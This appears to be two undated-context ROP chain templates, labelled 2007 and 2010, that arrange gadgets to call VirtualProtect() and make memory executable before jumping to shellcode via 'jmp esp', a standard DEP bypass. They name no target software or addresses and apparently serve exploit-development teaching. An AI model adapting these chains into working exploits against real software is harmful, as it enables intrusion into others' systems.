2007

POP EAX # RETN         ptr to VirtualProtect()
POP EBP # RETN         skip 4 bytes
POP EBX # RETN         Safe size to NEG
XCHG EAX, EBX # RETN
NEG EAX # RETN
XCHG EAX, EBX # RETN
POP EDX # RETN         0x00000040
XCHG EAX, EDX # RETN
NEG EAX # RETN
XCHG EAX, EDX # RETN
POP ECX # RETN         Writable location
POP EDI # RETN         RETN (ROP NOP)
POP ESI # RETN         JMP [EAX]
PUSHAD # RETN          ptr to 'jmp esp'

2010

POP EBP # RETN             skip 4 bytes
POP EBX # RETN             Safe size to NEG
XCHG EAX, EBX # RETN
NEG EAX # POP ESI # RETN   JUNK
XCHG EAX, EBX # RETN
POP EDX # RETN             0x00000040
XCHG EAX, EDX # RETN
NEG EAX # POP ESI # RETN   JUNK
XCHG EAX, EDX # RETN
POP ECX # RETN             Writable location
POP EDI # RETN             RETN (ROP NOP)
POP ESI # RETN             JMP [EAX]
POP EAX # RETN             ptr to VirtualProtect()
PUSHAD # RETN              ptr to 'jmp esp'